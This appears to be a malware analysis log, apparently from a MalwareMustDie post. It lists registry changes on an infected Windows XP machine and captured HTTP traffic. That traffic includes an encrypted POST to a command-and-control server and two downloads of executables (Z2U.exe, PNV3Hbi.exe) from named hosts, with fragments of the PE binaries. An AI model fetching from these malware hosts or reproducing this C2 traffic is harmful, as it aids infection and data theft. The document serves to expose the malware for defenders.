HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000027
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000002A
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000002
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "ab"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "cba"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "ba"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 15 00 00 00 30 58 95 5D 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 19 00 00 00 D0 F5 A2 C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 2F 00 00 00 20 13 9A 5D 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 35 00 00 00 60 65 CB C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 06 00 00 00 B0 96 90 4F 1C AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 07 00 00 00 D0 F5 A2 C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 06 00 00 00 40 E8 BD 4F 1C AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 07 00 00 00 60 65 CB C6 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 02 00 00 00 01 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 01 00 00 00 02 00 00 00 00 00 00 00 FF FF FF FF
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000004
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000006


==============================================
EVIL NETWORK CONNECTIVITIES..............
==============================================


(1)POST /forum/viewtopic.php HTTP/1.0
Host: 108.178.59.34
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 255
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
CRYPTED0.....?E..+..?X.Q...M.....i....fx....F.hp.q.....2.=B
..*..8..EA`....sj[.....O...2.#Ic.4H..BE...s..$.i.,X.....o.U
..5....GCP..7=.Jt.vpq5o.+.....)u(....?.$....`...O...u.n....
...V.....+Y.u .{..}X?V.h..x.....*.5.Gy.(...>)..1....@.B.B..;
=C.f..<.\......B.*HTTP/1.1 200 OK

Server: nginx/0.7.67
Date: Wed, 17 Oct 2012 04:17:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14-1~dotdeb.0

-----------
(2)GET /Z2U.exe HTTP/1.0
Host: 3073.a.hostable.me
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

HTTP/1.1 200 OK
Date: Wed, 17 Oct 2012 04:13:17 GMT
Server: Apache
Last-Modified: Wed, 17 Oct 2012 04:10:03 GMT
Accept-Ranges: bytes
Content-Length: 407128
Connection: close
Content-Type: application/x-msdownload
MZ......................@..........................................
.....!..L.!This program cannot be run in DOS mode.
$.......PE..L...


----------------------------------------

(3)GET /PNV3Hbi.exe HTTP/1.0
Host: 85.18.21.252
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


HTTP/1.1 200 OK
Date: Wed, 17 Oct 2012 04:09:24 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 17 Oct 2012 04:06:07 GMT
ETag: "242fca-63658-4cc3963d6a094"
Accept-Ranges: bytes
Content-Length: 407128
Connection: close
Content-Type: application/x-msdos-program
MZ......................@...............................................!
This program cannot be run in DOS mode.$.......PE..L....(~P..............
.Z....................@.......................... ......................
......................................................................U..
..E..M.....E..U..E..M...A.U..E..E..M.....U..E...]...U......E..E..M..M..E.
.E......E...]....U...E.P.M.Q.U.R.|......]........U..Q.E.."...E.."...E..".


#MalwareMustDie!!!!!!!!!